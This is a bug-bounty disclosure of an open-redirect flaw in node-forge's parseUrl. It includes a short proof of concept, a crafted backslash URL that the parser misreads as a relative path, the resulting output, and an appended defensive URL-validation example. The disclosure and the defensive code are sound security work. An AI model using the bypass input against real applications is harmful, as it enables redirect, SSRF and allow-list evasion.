huntr · ready-research · 41852C50-3C6D-4703-8C55-4DB27164A4AE
History: Sep 04, 2021 - 11:14 a.m.

Open Redirect in digitalbazaar/forge

2021-09-04 11:14:13
ready-research
www.huntr.dev
open redirect
digital bazaar
node-forge
url redirection
security vulnerability
ssrf
bug bounty

EPSS: 0.001 (percentile: 33.4%)

✍️ Description

The parseUrl functionality in node-forge mishandles certain uses of backslashes, such as https:/\/\/\, and interprets the URI as a relative path. Browsers accept backslashes after the protocol and treat them as normal slashes, while node-forge sees the URI as a relative path, which leads to URL Redirection to Untrusted Site.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var forge = require("node-forge");
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);

Execute the following commands in another terminal:

npm i node-forge # Install affected module
node poc.js #  Run the PoC

Check the Output:

{
  full: 'https://',
  scheme: 'https',
  host: '',
  port: 443,
  path: '/www.github.com/foo/bar',                        <<<---- path  should be "/foo/bar"
  fullHost: ''
}

In the above example, the path should be "/foo/bar", or it should be returned as null, as per https://github.com/digitalbazaar/forge/blob/c666282c812d6dc18e97b419b152dd6ad98c802c/lib/util.js#L2266

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
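A defender-side check for the allow-list and redirect cases, as an added example (not node-forge code and not part of the report): it parses the target with Node's WHATWG `URL` class, which treats backslashes after the scheme as slashes the way browsers do, and compares the resulting host to an allow list. `app.example.com`, `naiveIsSafe` and `safeRedirectTarget` are assumed names, and the naive check is a hypothetical stand-in for code that treats anything it cannot parse as a relative path.

```javascript
// Added example. Hosts and function names are constructed for illustration.
const ALLOWED_HOSTS = new Set(["app.example.com"]);
const SITE_ORIGIN = "https://app.example.com";

// Hypothetical naive check: input that does not look like scheme://host is
// assumed to be a relative (same-site) path and is allowed through.
function naiveIsSafe(target) {
  const m = /^(https?):\/\/([^\/:]*)/.exec(target);
  if (m === null) return true;          // "relative path" assumption
  return ALLOWED_HOSTS.has(m[2]);
}

// Hardened check: resolve the target the way a browser would, then decide
// on the parsed host. Returns the normalized URL, or the fallback path.
function safeRedirectTarget(target, fallback = "/") {
  let url;
  try {
    url = new URL(target, SITE_ORIGIN); // WHATWG parsing; '\' acts as '/'
  } catch {
    return fallback;                    // unparseable input is rejected
  }
  if (url.protocol !== "https:") return fallback;
  if (url.username !== "" || url.password !== "") return fallback;
  if (!ALLOWED_HOSTS.has(url.hostname)) return fallback;
  return url.href;                      // redirect to the parsed form only
}

// Constructed inputs. The first is the string from the description above,
// written with real backslashes ("\\" in a JS literal is one backslash).
const SAMPLES = [
  "https:/\\/\\/\\www.github.com/foo/bar",
  "/account/settings",
  "https://app.example.com/orders?id=7",
];

function compareChecks() {
  return SAMPLES.map((s) => ({
    input: s,
    naive: naiveIsSafe(s),
    hardened: safeRedirectTarget(s),
  }));
}

for (const row of compareChecks()) console.log(row);
```

Redirecting to the returned `href` rather than the raw input keeps the browser from re-interpreting a string the server read differently.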
